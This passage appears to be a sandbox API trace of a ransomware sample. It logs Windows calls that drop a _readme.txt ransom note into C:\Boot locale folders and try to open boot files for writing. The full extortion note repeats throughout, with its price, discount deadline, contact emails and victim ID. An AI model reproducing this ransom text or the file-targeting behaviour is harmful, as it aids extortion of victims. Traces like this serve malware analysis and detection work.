photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.885] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.885] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.885] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0228.885] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.886] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.886] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.886] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.886] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0228.886] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.886] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.886] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.886] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.886] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0228.886] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0228.887] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.887] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.887] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.887] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.887] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0228.887] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.887] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.887] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.887] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.887] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.888] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.888] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.888] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.888] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0228.888] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0228.888] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.888] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.888] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.888] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.889] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0228.889] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.889] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.889] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.889] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.889] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.889] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.889] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.889] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.889] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0228.890] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0228.890] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.890] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.890] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.890] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.890] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0228.890] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.890] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.890] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.890] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.890] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.891] GetProcAddress (hModule=0x75330000, 